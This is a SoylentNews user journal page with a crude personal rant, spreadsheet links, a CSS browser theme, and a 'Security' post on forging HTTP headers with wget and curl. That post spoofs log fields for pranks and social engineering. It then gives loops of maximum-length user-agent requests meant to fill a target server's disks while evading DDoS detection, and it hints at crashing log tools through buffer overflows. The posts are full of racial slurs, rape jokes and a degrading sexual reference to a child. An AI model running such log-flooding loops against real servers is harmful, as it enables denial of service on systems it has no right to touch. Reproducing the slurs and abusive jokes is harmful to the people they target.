Stories
Slash Boxes
Comments

SoylentNews is people

Log In

Log In

Create Account  |  Retrieve Password


cocaine overdose (6886)

cocaine overdose
cocaineoverdose@protonmail.com
http://127.0.0.1/

Currently: In the dunce chair. "Due to excessive bad posting from this IP or Subnet, comment posting has temporarily been disabled. If it's you, consider this a chance to sit in the timeout corner. "
The Fine Print: The following are owned by whoever posted them. We are not responsible for them in any way.
Friday March 23, 18
02:29 AM
/dev/random

my cat. I worked hard for those 50 karma points and then some women comes around, who you let into your private abode, eats your food, takes your sweatshirts, tries to elope with some Indian tech support monkey, and takes a metaphorical piss on your good name.

I consider this unconsensual ultra rape. I've now lost 30 bangladeshi toilet credits, where I normally would've only lost 20 for my outspoken opinions on societal norms in relation to intra-personal communication.

And she didn't bring the terriyaki I asked for. It's terriyaki thursday, why would you do this? Please, control your BPD for one night so I can masturbate with a good conscience. And take your risperidone.

Alarge Hoe, you will rue the day you decided to replace my white-bread toasts with rye.

P.S please return my lotion to its proper place, my knees are getting ashy

EDIT: NO HOLDS BARRED. WE'RE DOWN TO 4 SPAM MODS AND -2 NEW DELPHI POGS. SHE'S CRASHING THIS perfectly legitimate and civilized debater WITH NO SURVIVORS.

EDIT2: I have been barred from posting witty and thought-provoking free-style prose. There was one especially rebellious and introspective piece I had lined up, but I'm unable to get the satisfaction of getting the last quip in. Nor am I able to post anymore for another solar cycle.

EDIT3: In their infinite wisdom, the grand retard wranglers of Soylent News have given me back my manhood and I may rape and pillage once more. For this, I offer you one free redeemable coupon for a commissioned, post-societal portrait, created with bodily fluids, and a Whopper value meal.

Thursday March 22, 18
02:45 PM
Code

I've been using this for a couple of years now and it's worked well for me. Based off of the Katch-McArdle Formula for RDEE, Lyle McDonald's "Modified Protein Sparing Fast" and information about muscle/fat/calorie partitioning, and then some of my own research that's proven to be practical.

Don't mind the errors, they'll go away once the inputs are all filled correctly.

https://docs.google.com/spreadsheets/d/1VHsmkvRTai_cdcFlb8mfPF0RUci44c-snYx_JRMGa7A/edit?usp=sharing

https://mega.nz/#!NpRGVCZK!_yVwFIXIARexA6EgnOtNzs8fwTxVOZCuVIFLfAVGjhI

https://a.pomf.cat/egqrfx.xlsx

Sunday March 18, 18
08:30 PM
Code
I was working on a prank that never came around, and it involved a new theme I whipped up. Though I found out it looks a lot like the "Chillax" theme, after I was finished, I'm still satisfied with the result.

It's a less dead-inside Chillax (and it's easier to see read-comments). You can set it up using Firefox's userContent.css:

@-moz-document domain("soylentnews.org") {
    body
    {
    background: #d1d9ff !important;
    }
    .generaltitle div.title, .article div.title, .search-results h4
    {
    background-color: #101872 !important;
    background: linear-gradient(#101872, #212fcb) !important;
    border-radius: 10px 10px 0 0 !important;
    }
    #logo h1 a {
    background: url("soylent.png") no-repeat !important;
    background-size: 115px 80px !important;
    }
    a, .menu li a {
    color: #006 !important;
    }
    .generaltitle h3 a, .generaltitle h3 a:visited, .search-results h4 a, .search-results h4 a:visited {
    color: #fff !important;
    }
    .logout a {
    background: #342fe6 !important;
    color: #fff !important;
    }
    .more a {
    background-color: #342fe6 !important;
    color: #fff !important;
    }
    .title, .user {
    background: #8792ba !important;
    }
    #you, #journal .article h3 a, #journal .article h3 a:visited  {
    color: #fff !important;
    }
    input[type="submit"], button[type="submit"], .logout a, div.storylinks ul li.more a, .nbutton b a
    {
    background: #342fe6 !important;
    color: #fff !important;
    }
    .commentBox, .data_head {
    background: #2d28d5 !important;
    }
    #links a, #links a:visited, .details a, .details a span, .details, .details a span a {
    color: #020c83 !important;
    text-decoration: none !important;
    }
    #slogan * {
    color: #001e9f !important;
    }
    .commentTop .title {
    background: #342fe6 !important;
    }
    .dimmed .commentTop .title {
    background: #8792ba !important;
    }
    #usermenu ul.menu li a {
    background: #342fe6 !important;
    color: #fff !important;
    }
    #usermenu ul.menu li.selected a {
    background: #444287 !important;
    }
}

And the logo: https://i.imgur.com/pOLn9tb.png
Saturday March 17, 18
02:43 AM
Security

What's popping my fellow internet professionals. Today I'm going to learn you well about the fun shit you can do with HTTP headers.

You'll need:

  • A lUnix distro
  • Curl + Wget
  • 47 IQ points
  • Run

    export WEBSITE=www.google.com

    where "www.google.com" can be any website you want. For these dementartions, I'll be using my own bare Nginx server over 1Gb ethernet

If you have none of the above, please consider a different news source. Now, let's begin.

You know about user agents, right? Big bad advertisers want em for "sample sizing" to prop up their numbers. Webmasters want em to "enhance user experience," by selling your data to advertisers. The NSA/Webmasters/Advertisers want em to track you for all various reasons. I'm sure you know you can change these bad boys how ever you wish, right? Maybe you've even fiddled around with changing it to "GoogleBot" or something else completely retarded. Pretty lame, right?

Naw, my negroes, let me introduce you to some cooler shit you can do. Like telling the server monkey/ analytics scrapper to

wget -U "Go fuck yourself." $WEBSITE

Begets:

10.0.0.10 - - [16/Mar/2018:21:08:38 -0400] "GET / HTTP/1.1" 200 2682 "-" "Go fuck yourself."

Maybe you want something a bit more subtle?

wget -U "I know what you've done." $WEBSITE

Is:

10.0.0.10 - - [16/Mar/2018:21:09:42 -0400] "GET / HTTP/1.1" 200 2682 "-" "I know what you've done."

Still pretty lame. But did you know these can be arbitrarily long? Bet ya didn't you lil bugger. Let's trying someting a bit interesting, like sending love letters.

wget -U "Dear Underpaid Overweight Mediocre Server Monkey, you probably don't know who I am, but I know very well who you are. Don't be alarmed, I've been admiring you from afar for all too long now. Your stunning good looks: the acne that hasn't left you since childhood, makes me blush everytime I see those snow-capped volcanoes. And your greasy over-grown beard, I just can't help myself from thinking about how it'd feel scratching against my lady no-nos. Ohh..."'!~~~'" I just can't watch you anymore, I want you to know I exist. But, I don't know how, so I'm writing you here. Hopefully you'll notice me. Pleaes notice me, senpai"'!'"~ Your truly, Emelia." $WEBSITE

Really gets those penile juices flowing, right?:

10.0.0.10 - - [16/Mar/2018:21:18:27 -0400] "GET / HTTP/1.1" 200 2682 "-" "Dear Underpaid Overweight Mediocre Server Monkey, you probably don't know who I am, but I know very well who you are. Don't be alarmed, I've been admiring you from afar for all too long now. Your stunning good looks: the acne that hasn't left you since childhood, makes me blush everytime I see those snow-capped volcanoes. And your greasy over-grown beard, I just can't help myself from thinking about how it'd feel scratching against my lady no-nos. Ohh...!~~~ I just can't watch you anymore, I want you to know I exist. But, I don't know how, so I'm writing you here. Hopefully you'll notice me. Pleaes notice me, senpai!~ Your truly, Emelia."

Maybe you've also noticed that there's a big fat "GET / HTTP/1.1" sitting there, ripe for the raping. You'd be an astute little nip if you did. We can change that shit right around with:

wget -U "Go fuck yourself." --method="Go fuck yourself" $WEBSITE

Unforunatly, if the method's borked there won't be no UA:

10.0.0.10 - - [16/Mar/2018:21:22:25 -0400] "GO FUCK YOURSELF / HTTP/1.1" 400 173 "-" "-"

One thing I forgot to mention, these logs are formatted like:

$remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"

By default. So that means we can spoof remote_user by doing:

curl mom@$WEBSITE --user-agent "Hi honey, just wanted to let you know my new boyfriend's coming over for dinner tonight. Please be nice to, Jayquan"'!'

To get:

10.0.0.10 - mom [16/Mar/2018:21:31:46 -0400] "GET / HTTP/1.1" 200 2682 "-" "Hi honey, just wanted to let you know my new boyfriend's coming over for dinner tonight. Please be nice to, Jayquan!"

Or our humble referrer, for those social engineering points:

curl paulgraham@$WEBSITE --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows 98)" -e "https://news.ycombinator.com/"

For:

10.0.0.10 - paulgraham [16/Mar/2018:21:35:25 -0400] "GET / HTTP/1.1" 200 2682 "https://news.ycombinator.com/" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows 98)"

"Buh wha bout muh bites?" you may quander. Well, we can do that too.

curl paulgraham@$WEBSITE --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows 98)" -e "https://news.ycombinator.com/" -H "Diaper-Status: SOILED"

Ah well shit, seems like we can't:

10.0.0.10 - paulgraham [16/Mar/2018:21:38:01 -0400] "GET / HTTP/1.1" 200 2682 "https://news.ycombinator.com/" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows 98)"

Or can we?

curl paulgraham@$WEBSITE --user-agent "MY ADULT DIAPER NEEDS TO BE CHANGED URGENTLY. I REQUIRE A BOY OF 7 YEARS FROM COLUMBIA TO WIPE THE FECES FROM WITHIN MY ASS ROLLS TO WITHOUT INTO THE FRESH AIR. AGAIN, THIS REQUEST IS URGENT AND MUST BE ACCEPTED." -e "https://news.ycombinator.com/"

No we can't, because my dyslexia forgot the "body" in "body_bytes_sent." Well, anyway this is just child's shit, or should I say Graham's shit? There's no limit to any of the strings. So you can do something like:

wget -U "$(printf "%0.sA" {1..100})" $WEBSITE

To get:

10.0.0.10 - - [16/Mar/2018:22:05:59 -0400] "GET / HTTP/1.1" 200 2682 "-" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

Or:

solid_shit=$(printf "%0.sA" {1..10}); wget -U "$(printf "%0.sA" {1..1000})" $WEBSITE

For:

10.0.0.10 - - [16/Mar/2018:22:06:29 -0400] "GET / HTTP/1.1" 200 2682 "-" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

How about:

curl --user-agent "$(printf "%0.sA" {1..10000})" $WEBSITE

Too bad, it returns a 400 too long error and the log doesn't show our UA. The larget I could get was 8178 As. Which, after a bit of trial and error, gets me a 1MB large nginx_access.log. We can get past that with:

for i in {1..12}; do curl --user-agent "$(printf "%0.sA" {1..8178})" $WEBSITE; done

Gives us 97KBs of As in the logfile. Changing that to 200 gives us 1.6MB. If we do 10,000 we get 79MBs. If we were to extrapolate these results, we'd need around 120 million requests to fill up an entire 1TB harddrive. If we wanted to avoid sounding the DDoS alarms, we could request only the 217 byte headers:

for i in {1..10000}; do curl -I --user-agent "$(printf "%0.sA" {1..8178})" $WEBSITE; done

That would still get the same result, but the load on the server would be much less noticeable. Props if you can find a small file to (preferabbly 1B) to download instead. Generally speaking, you could set up a small timer to curl on through the weekend and fill up some harddrives. Usually they're monitored by tools or automatically backed up, and that can cause some havoc on its own. But, the real meat is with the tools that referrence those logs, or referrence the headers in raw form. You can probably cause some buffer overflows in old C programs that are still running, or cause whatever tools are interfacing with the headers to snap like an over-extended spine during an OHP. Do with this info whatever you want, I'm only here to try out this journal system.